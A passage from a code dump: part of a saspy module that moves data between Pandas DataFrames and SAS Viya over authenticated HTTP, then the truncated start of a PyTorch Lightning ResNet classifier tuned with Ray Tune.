to create or overwrite\n remotefile - path to remote file tp dpwnload\n overwrite - overwrite the output file if it exists?\n \"\"\"\n valid = self._sb.file_info(remotefile, quiet = True)\n\n if valid is None:\n return {'Success' : False,\n 'LOG' : \"File \"+str(remotefile)+\" does not exist.\"}\n\n if valid == {}:\n return {'Success' : False,\n 'LOG' : \"File \"+str(remotefile)+\" is a directory.\"}\n\n if os.path.isdir(localfile):\n locf = localfile + os.sep + remotefile.rpartition(self._sb.hostsep)[2]\n else:\n locf = localfile\n\n try:\n fd = open(locf, 'wb')\n fd.write(b'write can fail even if open worked, as it turns out')\n fd.close()\n fd = open(locf, 'wb')\n except OSError as e:\n return {'Success' : False,\n 'LOG' : \"File \"+str(locf)+\" could not be opened or written to. Error was: \"+str(e)}\n\n code = \"filename _sp_updn '\"+remotefile+\"' recfm=F encoding=binary lrecl=4096;\"\n\n ll = self.submit(code, \"text\")\n logf = ll['LOG']\n\n # GET data\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\",\"Content-Type\":\"application/octet-stream\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', self._uri_files+\"/_sp_updn/content\", headers=headers)\n req = conn.getresponse()\n status = req.status\n\n fd.write(req.read())\n fd.flush()\n fd.close()\n conn.close()\n\n ll = self.submit(\"filename _sp_updn;\", 'text')\n logf += ll['LOG']\n\n return {'Success' : True,\n 'LOG' : logf}\n\n def _getbytelenF(self, x):\n return len(x.encode(self.sascfg.encoding))\n\n def _getbytelenR(self, x):\n return len(x.encode(self.sascfg.encoding, errors='replace'))\n\n def dataframe2sasdata(self, df: '<Pandas Data Frame object>', table: str ='a',\n libref: str =\"\", keep_outer_quotes: bool=False,\n embedded_newlines: bool=True,\n LF: str = '\\x01', CR: str = '\\x02',\n colsep: str = '\\x03', colrep: str = ' ',\n datetimes: dict={}, outfmts: dict={}, labels: dict={},\n outdsopts: dict={}, encode_errors = None, char_lengths = None,\n **kwargs):\n '''\n This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.\n df - Pandas Data Frame to import to a SAS Data Set\n table - the name of the SAS Data Set to create\n libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned\n keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.\n embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them iported into the SAS data set\n LF - if embedded_newlines=True, the chacter to use for LF when transferring the data; defaults to '\\x01'\n CR - if embedded_newlines=True, the chacter to use for CR when transferring the data; defaults to '\\x02'\n colsep - the column seperator character used for streaming the delimmited data to SAS defaults to '\\x03'\n datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes\n outfmts - dict with column names and SAS formats to assign to the new SAS data set\n labels - dict with column names and SAS Labels to assign to the new SAS data set\n outdsopts - a dictionary containing output data set options for the table being created\n encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char \\\n 'ignore' will not transcode n Python, so you get whatever happens with your data and SAS\n char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set\n '''\n input = \"\"\n xlate = \"\"\n card = \"\"\n format = \"\"\n length = \"\"\n label = \"\"\n dts = []\n ncols = len(df.columns)\n lf = \"'\"+'%02x' % ord(LF.encode(self.sascfg.encoding))+\"'x\"\n cr = \"'\"+'%02x' % ord(CR.encode(self.sascfg.encoding))+\"'x \"\n delim = \"'\"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+\"'x \"\n\n dts_upper = {k.upper():v for k,v in datetimes.items()}\n dts_keys = dts_upper.keys()\n fmt_upper = {k.upper():v for k,v in outfmts.items()}\n fmt_keys = fmt_upper.keys()\n lab_upper = {k.upper():v for k,v in labels.items()}\n lab_keys = lab_upper.keys()\n\n if encode_errors is None:\n encode_errors = 'fail'\n\n bpc = self._sb.pyenc[0]\n if char_lengths and str(char_lengths).strip() in ['1','2','3','4']:\n bpc = int(char_lengths)\n if char_lengths and str(char_lengths) == 'exact':\n CnotB = False\n else:\n CnotB = bpc == 1\n\n if type(char_lengths) is not dict or len(char_lengths) < ncols:\n charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)\n else:\n charlens = char_lengths\n\n if charlens is None:\n return -1\n\n chr_upper = {k.upper():v for k,v in charlens.items()}\n\n if type(df.index) != pd.RangeIndex:\n warnings.warn(\"Note that Indexes are not transferred over as columns. Only actual coulmns are transferred\")\n\n for name in df.columns:\n colname = str(name).replace(\"'\", \"''\")\n col_up = str(name).upper()\n input += \"'\"+colname+\"'n \"\n if col_up in lab_keys:\n label += \"label '\"+colname+\"'n =\"+lab_upper[col_up]+\";\\n\"\n if col_up in fmt_keys:\n format += \"'\"+colname+\"'n \"+fmt_upper[col_up]+\" \"\n\n if df.dtypes[name].kind in ('O','S','U','V'):\n try:\n length += \" '\"+colname+\"'n $\"+str(chr_upper[col_up])\n except KeyError as e:\n logger.error(\"Dictionary provided as char_lengths is missing column: \"+colname)\n raise e\n if keep_outer_quotes:\n input += \"~ \"\n dts.append('C')\n if embedded_newlines:\n xlate += \" '\"+colname+\"'n = translate('\"+colname+\"'n, '0A'x, \"+lf+\");\\n\"\n xlate += \" '\"+colname+\"'n = translate('\"+colname+\"'n, '0D'x, \"+cr+\");\\n\"\n else:\n if df.dtypes[name].kind in ('M'):\n length += \" '\"+colname+\"'n 8\"\n input += \":B8601DT26.6 \"\n if col_up not in dts_keys:\n if col_up not in fmt_keys:\n format += \"'\"+colname+\"'n E8601DT26.6 \"\n else:\n if dts_upper[col_up].lower() == 'date':\n if col_up not in fmt_keys:\n format += \"'\"+colname+\"'n E8601DA. \"\n xlate += \" '\"+colname+\"'n = datepart('\"+colname+\"'n);\\n\"\n else:\n if dts_upper[col_up].lower() == 'time':\n if col_up not in fmt_keys:\n format += \"'\"+colname+\"'n E8601TM. \"\n xlate += \" '\"+colname+\"'n = timepart('\"+colname+\"'n);\\n\"\n else:\n logger.warning(\"invalid value for datetimes for column \"+colname+\". Using default.\")\n if col_up not in fmt_keys:\n format += \"'\"+colname+\"'n E8601DT26.6 \"\n dts.append('D')\n else:\n length += \" '\"+colname+\"'n 8\"\n if df.dtypes[name] == 'bool':\n dts.append('B')\n else:\n dts.append('N')\n\n code = \"data \"\n if len(libref):\n code += libref+\".\"\n code += \"'\"+table.strip().replace(\"'\", \"''\")+\"'n\"\n\n if len(outdsopts):\n code += '('\n for key in outdsopts:\n code += key+'='+str(outdsopts[key]) + ' '\n code += \");\\n\"\n else:\n code += \";\\n\"\n\n if len(length):\n code += \"length \"+length+\";\\n\"\n if len(format):\n code += \"format \"+format+\";\\n\"\n code += label\n code += \"infile datalines delimiter=\"+delim+\" STOPOVER;\\ninput @;\\nif _infile_ = '' then delete;\\ninput \"+input+\";\\n\"+xlate+\";\\ndatalines4;\"\n self._asubmit(code, \"text\")\n\n blksz = int(kwargs.get('blocksize', 1000000))\n noencode = self._sb.sascei == 'utf-8' or encode_errors == 'ignore'\n row_num = 0\n code = \"\"\n for row in df.itertuples(index=False):\n row_num += 1\n card = \"\"\n for col in range(ncols):\n var = str(row[col])\n\n if dts[col] == 'N' and var == 'nan':\n var = '.'\n elif dts[col] == 'C':\n if var == 'nan' or len(var) == 0:\n var = ' '\n else:\n var = var.replace(colsep, colrep)\n elif dts[col] == 'B':\n var = str(int(row[col]))\n elif dts[col] == 'D':\n if var in ['nan', 'NaT', 'NaN']:\n var = '.'\n else:\n var = str(row[col].to_datetime64())[:26]\n\n card += var\n if col < (ncols-1):\n card += colsep\n\n if embedded_newlines:\n card = card.replace(LF, colrep).replace(CR, colrep)\n card = card.replace('\\n', LF).replace('\\r', CR)\n\n code += card+\"\\n\"\n\n if len(code) > blksz:\n if not noencode:\n if encode_errors == 'fail':\n if CnotB:\n try:\n chk = code.encode(self.sascfg.encoding)\n except Exception as e:\n self._asubmit(\";;;;\\n;;;;\", \"text\")\n ll = self.submit(\"run;\", 'text')\n logger.error(\"Transcoding error encountered. Data transfer stopped on or before row \"+str(row_num))\n logger.error(\"DataFrame contains characters that can't be transcoded into the SAS session encoding.\\n\"+str(e))\n return row_num\n else:\n code = code.encode(self.sascfg.encoding, errors='replace').decode(self.sascfg.encoding)\n\n self._asubmit(code, \"text\")\n code = \"\"\n\n if not noencode and len(code) > 0:\n if encode_errors == 'fail':\n if CnotB:\n try:\n code = code.encode(self.sascfg.encoding).decode(self.sascfg.encoding)\n except Exception as e:\n self._asubmit(\";;;;\\n;;;;\", \"text\")\n ll = self.submit(\"run;\", 'text')\n logger.error(\"Transcoding error encountered. Data transfer stopped on or before row \"+str(row_num))\n logger.error(\"DataFrame contains characters that can't be transcoded into the SAS session encoding.\\n\"+str(e))\n return row_num\n else:\n code = code.encode(self.sascfg.encoding, errors='replace').decode(self.sascfg.encoding)\n\n self._asubmit(code+\";;;;\\n;;;;\", \"text\")\n ll = self.submit(\"quit;\", 'text')\n return None\n\n def sasdata2dataframe(self, table: str, libref: str ='', dsopts: dict = None,\n rowsep: str = '\\x01', colsep: str = '\\x02',\n rowrep: str = ' ', colrep: str = ' ',\n **kwargs) -> '<Pandas Data Frame object>':\n '''\n This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.\n table - the name of the SAS Data Set you want to export to a Pandas Data Frame\n libref - the libref for the SAS Data Set.\n dsopts - data set options for the input SAS Data Set\n rowsep - the row seperator character to use; defaults to '\\x01'\n colsep - the column seperator character to use; defaults to '\\x02'\n rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '\n colrep - the char to convert to for any embedded colsep chars, defaults to ' '\n '''\n dsopts = dsopts if dsopts is not None else {}\n\n method = kwargs.pop('method', None)\n if method and method.lower() == 'csv':\n return self.sasdata2dataframeCSV(table, libref, dsopts, **kwargs)\n #elif method and method.lower() == 'disk':\n else:\n return self.sasdata2dataframeDISK(table, libref, dsopts, rowsep, colsep,\n rowrep, colrep, **kwargs)\n\n\n def sasdata2dataframeCSV(self, table: str, libref: str ='', dsopts: dict =None, opts: dict = None,\n **kwargs) -> '<Pandas Data Frame object>':\n '''\n This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.\n table - the name of the SAS Data Set you want to export to a Pandas Data Frame\n libref - the libref for the SAS Data Set.\n dsopts - data set options for the input SAS Data Set\n opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)\n tempfile - DEPRECATED\n tempkeep - DEPRECATED\n\n These two options are for advanced usage. They override how saspy imports data. For more info\n see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques\n\n dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses\n my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=\n '''\n tmp = kwargs.pop('tempfile', None)\n tmp = kwargs.pop('tempkeep', None)\n\n dsopts = dsopts if dsopts is not None else {}\n opts = opts if opts is not None else {}\n\n if libref:\n tabname = libref+\".'\"+table.strip().replace(\"'\", \"''\")+\"'n \"\n else:\n tabname = \"'\"+table.strip().replace(\"'\", \"''\")+\"'n \"\n\n code = \"data work.sasdata2dataframe / view=work.sasdata2dataframe; set \"+tabname+self._sb._dsopts(dsopts)+\";run;\\n\"\n\n ll = self.submit(code, \"text\")\n\n ##GET Data Table Info\n #conn = self.sascfg.HTTPConn; conn.connect()\n #headers={\"Accept\":\"application/vnd.sas.compute.data.table+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n #conn.request('GET', \"/compute/sessions/\"+self.pid+\"/data/work/sasdata2dataframe\", headers=headers)\n #req = conn.getresponse()\n #status = req.status\n #conn.close()\n\n #resp = req.read()\n #js = json.loads(resp.decode(self.sascfg.encoding))\n\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', \"/compute/sessions/\"+self.pid+\"/data/work/sasdata2dataframe/columns?start=0&limit=9999999\", headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n js = json.loads(resp.decode(self.sascfg.encoding))\n\n varlist = []\n vartype = []\n nvars = js.get('count')\n lst = js.get('items')\n for i in range(len(lst)):\n varlist.append(lst[i].get('name'))\n vartype.append(lst[i].get('type'))\n\n dvarlist = list(varlist)\n for i in range(len(varlist)):\n varlist[i] = varlist[i].replace(\"'\", \"''\")\n\n topts = dict(dsopts)\n topts.pop('firstobs', None)\n topts.pop('obs', None)\n\n code = \"data work._n_u_l_l_;output;run;\\n\"\n code += \"data _null_; set work._n_u_l_l_ \"+tabname+self._sb._dsopts(topts)+\";put 'FMT_CATS=';\\n\"\n\n for i in range(nvars):\n code += \"_tom = vformatn('\"+varlist[i]+\"'n);put _tom;\\n\"\n code += \"stop;\\nrun;\\nproc delete data=work._n_u_l_l_;run;\"\n\n ll = self.submit(code, \"text\")\n\n l2 = ll['LOG'].rpartition(\"FMT_CATS=\")\n l2 = l2[2].partition(\"\\n\")\n varcat = l2[2].split(\"\\n\", nvars)\n del varcat[nvars]\n\n code = \"proc delete data=work.sasdata2dataframe(memtype=view);run;\\n\"\n code += \"data work.sasdata2dataframe / view=work.sasdata2dataframe; set \"+tabname+self._sb._dsopts(dsopts)+\";\\nformat \"\n\n idx_col = kwargs.pop('index_col', False)\n eng = kwargs.pop('engine', 'c')\n my_fmts = kwargs.pop('my_fmts', False)\n k_dts = kwargs.pop('dtype', None)\n if k_dts is None and my_fmts:\n logger.warning(\"my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.\")\n my_fmts = False\n\n if not my_fmts:\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n code += \"'\"+varlist[i]+\"'n \"\n if varcat[i] in self._sb.sas_date_fmts:\n code += 'E8601DA10. '\n else:\n if varcat[i] in self._sb.sas_time_fmts:\n code += 'E8601TM15.6 '\n else:\n if varcat[i] in self._sb.sas_datetime_fmts:\n code += 'E8601DT26.6 '\n else:\n code += 'best32. '\n code += \";run;\\n\"\n ll = self.submit(code, \"text\")\n\n if k_dts is None:\n dts = {}\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:\n dts[dvarlist[i]] = 'float'\n else:\n dts[dvarlist[i]] = 'str'\n else:\n dts[dvarlist[i]] = 'str'\n else:\n dts = k_dts\n\n code = \"filename _tomodsx '\"+self._sb.workpath+\"_tomodsx' lrecl=\"+str(self.sascfg.lrecl)+\" recfm=v encoding='utf-8';\\n\"\n code += \"proc export data=work.sasdata2dataframe outfile=_tomodsx dbms=csv replace;\\n\"\n code += self._sb._expopts(opts)+\" run;\\n\"\n code += \"proc delete data=work.sasdata2dataframe(memtype=view);run;\\n\"\n\n ll = self.submit(code, 'text')\n logf = ll['LOG']\n\n code = \"filename _sp_updn '\"+self._sb.workpath+\"_tomodsx' recfm=F encoding=binary lrecl=4096;\"\n\n ll = self.submit(code, \"text\")\n logf += ll['LOG']\n\n # GET data\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\",\"Content-Type\":\"application/octet-stream\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', self._uri_files+\"/_sp_updn/content\", headers=headers)\n req = conn.getresponse()\n status = req.status\n\n sockout = _read_sock(req=req)\n\n df = pd.read_csv(sockout, index_col=idx_col, encoding='utf8', engine=eng, dtype=dts, **kwargs)\n\n conn.close()\n\n if k_dts is None: # don't override these if user provided their own dtypes\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:\n df[dvarlist[i]] = pd.to_datetime(df[dvarlist[i]], errors='coerce')\n\n ll = self.submit(\"filename _sp_updn;\", 'text')\n logf += ll['LOG']\n\n return df\n\n def sasdata2dataframeDISK(self, table: str, libref: str ='', dsopts: dict = None,\n rowsep: str = '\\x01', colsep: str = '\\x02',\n rowrep: str = ' ', colrep: str = ' ', **kwargs) -> '<Pandas Data Frame object>':\n '''\n This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.\n table - the name of the SAS Data Set you want to export to a Pandas Data Frame\n libref - the libref for the SAS Data Set.\n dsopts - data set options for the input SAS Data Set\n rowsep - the row seperator character to use; defaults to '\\x01'\n colsep - the column seperator character to use; defaults to '\\x02'\n rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '\n colrep - the char to convert to for any embedded colsep chars, defaults to ' '\n tempfile - DEPRECATED\n tempkeep - DEPRECATED\n\n These two options are for advanced usage. They override how saspy imports data. For more info\n see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques\n\n dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses\n my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=\n '''\n tmp = kwargs.pop('tempfile', None)\n tmp = kwargs.pop('tempkeep', None)\n\n dsopts = dsopts if dsopts is not None else {}\n\n if libref:\n tabname = libref+\".'\"+table.strip().replace(\"'\", \"''\")+\"'n \"\n else:\n tabname = \"'\"+table.strip().replace(\"'\", \"''\")+\"'n \"\n\n code = \"data work.sasdata2dataframe / view=work.sasdata2dataframe; set \"+tabname+self._sb._dsopts(dsopts)+\";run;\\n\"\n\n ll = self.submit(code, \"text\")\n\n ##GET Data Table Info\n #conn = self.sascfg.HTTPConn; conn.connect()\n #headers={\"Accept\":\"application/vnd.sas.compute.data.table+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n #conn.request('GET', \"/compute/sessions/\"+self.pid+\"/data/work/sasdata2dataframe\", headers=headers)\n #req = conn.getresponse()\n #status = req.status\n #conn.close()\n\n #resp = req.read()\n #js = json.loads(resp.decode(self.sascfg.encoding))\n\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', \"/compute/sessions/\"+self.pid+\"/data/work/sasdata2dataframe/columns?start=0&limit=9999999\", headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n js = json.loads(resp.decode(self.sascfg.encoding))\n\n varlist = []\n vartype = []\n nvars = js.get('count')\n lst = js.get('items')\n for i in range(len(lst)):\n varlist.append(lst[i].get('name'))\n vartype.append(lst[i].get('type'))\n\n dvarlist = list(varlist)\n for i in range(len(varlist)):\n varlist[i] = varlist[i].replace(\"'\", \"''\")\n\n topts = dict(dsopts)\n topts.pop('firstobs', None)\n topts.pop('obs', None)\n\n code = \"proc delete data=work.sasdata2dataframe(memtype=view);run;\"\n code += \"data work._n_u_l_l_;output;run;\\n\"\n code += \"data _null_; set work._n_u_l_l_ \"+tabname+self._sb._dsopts(topts)+\";put 'FMT_CATS=';\\n\"\n\n for i in range(nvars):\n code += \"_tom = vformatn('\"+varlist[i]+\"'n);put _tom;\\n\"\n code += \"stop;\\nrun;\\nproc delete data=work._n_u_l_l_;run;\"\n\n ll = self.submit(code, \"text\")\n\n l2 = ll['LOG'].rpartition(\"FMT_CATS=\")\n l2 = l2[2].partition(\"\\n\")\n varcat = l2[2].split(\"\\n\", nvars)\n del varcat[nvars]\n\n rdelim = \"'\"+'%02x' % ord(rowsep.encode(self.sascfg.encoding))+\"'x\"\n cdelim = \"'\"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+\"'x \"\n\n idx_col = kwargs.pop('index_col', False)\n eng = kwargs.pop('engine', 'c')\n my_fmts = kwargs.pop('my_fmts', False)\n k_dts = kwargs.pop('dtype', None)\n if k_dts is None and my_fmts:\n logger.warning(\"my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.\")\n my_fmts = False\n\n code = \"filename _tomodsx '\"+self._sb.workpath+\"_tomodsx' recfm=v termstr=NL encoding='utf-8';\\n\"\n code += \"data _null_; set \"+tabname+self._sb._dsopts(dsopts)+\";\\n\"\n\n if not my_fmts:\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n code += \"format '\"+varlist[i]+\"'n \"\n if varcat[i] in self._sb.sas_date_fmts:\n code += 'E8601DA10.'\n else:\n if varcat[i] in self._sb.sas_time_fmts:\n code += 'E8601TM15.6'\n else:\n if varcat[i] in self._sb.sas_datetime_fmts:\n code += 'E8601DT26.6'\n else:\n code += 'best32.'\n code += '; '\n if i % 10 == 9:\n code +='\\n'\n\n miss = {}\n code += \"\\nfile _tomodsx lrecl=\"+str(self.sascfg.lrecl)+\" dlm=\"+cdelim+\" recfm=v termstr=NL encoding='utf-8';\\n\"\n for i in range(nvars):\n if vartype[i] != 'FLOAT':\n code += \"'\"+varlist[i]+\"'n = translate('\"\n code += varlist[i]+\"'n, '{}'x, '{}'x); \".format( \\\n '%02x%02x' % \\\n (ord(rowrep.encode(self.sascfg.encoding)), \\\n ord(colrep.encode(self.sascfg.encoding))),\n '%02x%02x' % \\\n (ord(rowsep.encode(self.sascfg.encoding)), \\\n ord(colsep.encode(self.sascfg.encoding))))\n miss[dvarlist[i]] = ' '\n else:\n code += \"if missing('\"+varlist[i]+\"'n) then '\"+varlist[i]+\"'n = .; \"\n miss[dvarlist[i]] = '.'\n if i % 10 == 9:\n code +='\\n'\n code += \"\\nput \"\n for i in range(nvars):\n code += \" '\"+varlist[i]+\"'n \"\n if i % 10 == 9:\n code +='\\n'\n code += rdelim+\";\\nrun;\"\n\n ll = self.submit(code, \"text\")\n\n if k_dts is None:\n dts = {}\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:\n dts[dvarlist[i]] = 'float'\n else:\n dts[dvarlist[i]] = 'str'\n else:\n dts[dvarlist[i]] = 'str'\n else:\n dts = k_dts\n\n quoting = kwargs.pop('quoting', 3)\n\n code = \"filename _sp_updn '\"+self._sb.workpath+\"_tomodsx' recfm=F encoding=binary lrecl=4096;\"\n\n ll = self.submit(code, \"text\")\n logf = ll['LOG']\n\n # GET data\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\",\"Content-Type\":\"application/octet-stream\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', self._uri_files+\"/_sp_updn/content\", headers=headers)\n req = conn.getresponse()\n status = req.status\n\n\n sockout = _read_sock(req=req, method='DISK', rsep=(colsep+rowsep+'\\n').encode(), rowsep=rowsep.encode())\n\n df = pd.read_csv(sockout, index_col=idx_col, engine=eng, header=None, names=dvarlist,\n sep=colsep, lineterminator=rowsep, dtype=dts, na_values=miss,\n encoding='utf-8', quoting=quoting, **kwargs)\n\n conn.close()\n\n if k_dts is None: # don't override these if user provided their own dtypes\n for i in range(nvars):\n if vartype[i] == 'FLOAT':\n if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:\n df[dvarlist[i]] = pd.to_datetime(df[dvarlist[i]], errors='coerce')\n\n ll = self.submit(\"filename _sp_updn;\", 'text')\n logf += ll['LOG']\n\n return df\n\nclass _read_sock(io.StringIO):\n def __init__(self, **kwargs):\n self.req = kwargs.get('req')\n self.method = kwargs.get('method', 'CSV')\n self.rowsep = kwargs.get('rowsep', b'\\n')\n self.rsep = kwargs.get('rsep', self.rowsep)\n self.datar = b\"\"\n\n def read(self, size=4096):\n datl = 0\n size = max(size, 4096)\n notarow = True\n\n while datl < size or notarow:\n data = self.req.read(size)\n dl = len(data)\n\n if dl:\n datl += dl\n self.datar += data\n if notarow:\n notarow = self.datar.count(self.rsep) <= 0\n else:\n if len(self.datar) <= 0:\n return ''\n else:\n break\n\n data = self.datar.rpartition(self.rsep)\n if self.method == 'DISK':\n datap = (data[0]+data[1]).replace(self.rsep, self.rowsep)\n else:\n datap = data[0]+data[1]\n self.datar = data[2]\n\n return datap.decode()\n\n"} {"ext": "py", "sha": "1a30bc6d2b8411848efd48e48f9dc4590ba994ae", "content": "import pandas as pd\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom pytorch_lightning.utilities.cloud_io import load as pl_load\nimport argparse\nimport json\n\nimport pytorch_lightning as pl\nimport pandas as pd\nimport sklearn\nfrom ray import tune\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn\nimport os\nfrom ray.tune import CLIReporter\nfrom ray.tune.schedulers import ASHAScheduler, PopulationBasedTraining\nfrom ray.tune.integration.pytorch_lightning import TuneReportCallback\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nfrom torch.optim import SGD, Adam\nfrom torchvision import transforms\nimport MLmodels as m\nfrom ray.tune.integration.pytorch_lightning import TuneReportCheckpointCallback\nfrom ray.tune.suggest.bayesopt import BayesOptSearch\n\n\nclass ResNetClassifier(pl.LightningModule):\n def __init__(self, config, num_classes, resnet_version,\n test_path=None,\n optimizer='adam',\n transfer=True):\n super().__init__()\n\n self.__dict__.update(locals())\n resnets = {\n 18: models.resnet18, 34: models.resnet34,\n 50: models.resnet50, 101: models.resnet101,\n 152: models.resnet152\n }\n optimizers = {'adam': Adam, 'sgd': SGD}\n self.optimizer = optimizers[optimizer]\n # hyperparameters\n self.lr = config['lr']\n self.batch_size = config['batch_size']\n # for importing different versions of the data\n self.datatype = config['datatype']\n\n if 'B' in self.datatype and '20' not in self.datatype:\n self.data_length = 40\n else:\n self.data_length = 20\n\n self.training_data = None\n self.validation_data = None\n\n # Using a pretrained ResNet backbone\n self.resnet_model = resnets[resnet_version](pretrained=transfer)\n # Replace old FC layer with Identity so we can train our own\n linear_size = list(self.resnet_model.children())[-1].in_features\n\n # replace final layer for fine tuning\n fcn = [\n nn.Dropout(config['dr']),\n nn.Linear(linear_size, linear_size),\n ]\n\n fcn2 = [\n nn.Linear(linear_size, num_classes)\n ]\n\n if num_classes > 1:\n fcn2.append(torch.nn.LogSoftmax(dim=1))\n\n self.fcn1 = nn.Sequential(*fcn)\n self.d1 = m.drelu(linear_size)\n self.fcn2 = nn.Sequential(*fcn2)\n self.resnet_model.conv1 = torch.nn.Conv1d(1, 64, (7, 7), (2, 2), (3, 3), bias=False)\n\n modules = list(self.resnet_model.children())[:-1] # delete the last fc layer.\n self.resnet_model = nn.Sequential(*modules)\n\n def forward(self, X):\n x = self.resnet_model(X)\n x = x.view(x.size(0), -1) # flatten\n x = self.fcn1(x)\n x = self.d1(x)\n x = self.fcn2(x)\n return x\n\n def configure_optimizers(self):\n return self.optimizer(self.parameters(), lr=self.lr)\n\n def prepare_data(self):\n # import our data\n train, validate, weights = m.get_rawdata(self.datatype, 10, 5, round=8)\n _train = train.copy()\n _validate = validate.copy()\n\n # Assigns labels for learning\n _train[\"binary\"] = _train[\"affinity\"].apply(m.bi_labelM)\n _validate[\"binary\"] = _validate[\"affinity\"].apply(m.bi_labelM)\n\n _weights = torch.FloatTensor(weights)\n # instantiate loss criterion, need weights so put this here\n self.criterion = m.SmoothCrossEntropyLoss(weight=_weights, smoothing=0.01)\n\n self.training_data = _train\n self.validation_data = _validate\n\n def train_dataloader(self):\n # Data Loading\n train_reader = m.NAReader(self.training_data, shuffle=True, max_length=self.data_length)\n\n train_loader = torch.utils.data.DataLoader(\n train_reader,\n batch_size=self.batch_size,\n collate_fn=m.my_collate,\n num_workers=4,\n # pin_memory=True,\n shuffle=True\n )\n\n return train_loader\n\n def training_step(self, batch, batch_idx):\n seq, x, y = batch\n softmax = self(x)\n train_loss = self.criterion(softmax, y)\n\n # Convert to labels\n preds = torch.argmax(softmax, 1).clone().double() # convert to torch float 64\n\n predcpu = list(preds.detach().cpu().numpy())\n ycpu = list(y.detach().cpu().numpy())\n train_acc = sklearn.metrics.balanced_accuracy_score(ycpu, predcpu)\n\n # perform logging\n self.log(\"ptl/train_loss\", train_loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n self.log(\"ptl/train_accuracy\", train_acc, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n return train_loss\n\n def val_dataloader(self):\n # Data Loading\n val_reader = m.NAReader(self.validation_data, shuffle=False)\n\n val_loader = torch.utils.data.DataLoader(\n val_reader,\n batch_size=self.batch_size,\n collate_fn=m.my_collate,\n num_workers=4,\n # pin_memory=True,\n shuffle=False\n )\n\n return val_loader\n\n def validation_step(self, batch, batch_idx):\n seq, x, y = batch\n softmax = self(x)\n val_loss = self.criterion(softmax, y)\n\n # Convert to labels\n preds = torch.argmax(softmax, 1).clone().double() # convert to torch float 64\n\n predcpu = list(preds.detach().cpu().numpy())\n ycpu = list(y.detach().cpu().numpy())\n val_acc = sklearn.metrics.balanced_accuracy_score(ycpu, predcpu)\n\n # perform logging\n self.log(\"ptl/val_loss\", val_loss, on_epoch=True, prog_bar=True, logger=True)\n self.log(\"ptl/val_accuracy\", val_acc, on_epoch=True, prog_bar=True, logger=True)\n return {\"val_loss\": val_loss, \"val_acc\": val_acc}\n\n\ndef train_resnet(config, checkpoint_dir=None, num_epochs=10, num_gpus=0):\n trainer = pl.Trainer(\n # default_root_dir=\"./checkpoints/\",\n max_epochs=num_epochs,\n gpus=num_gpus,\n logger=TensorBoardLogger(\n save_dir=tune.get_trial_dir(), name=\"\", version=\".\"),\n progress_bar_refresh_rate=0,\n callbacks=[\n TuneReportCheckpointCallback(\n metrics={\n \"loss\": \"ptl/val_loss\",\n \"acc\": \"ptl/val_accuracy\"\n },\n filename=\"checkpoint\",\n on=\"validation_end\")\n ]\n )\n\n if checkpoint_dir:\n # Currently, this leads to errors:\n # model = LightningMNISTClassifier.load_from_checkpoint(\n # os.path.join(checkpoint, \"checkpoint\"))\n # Workaround:\n ckpt = pl_load(\n os.path.join(checkpoint_dir, \"checkpoint\"),\n map_location=lambda storage, loc: 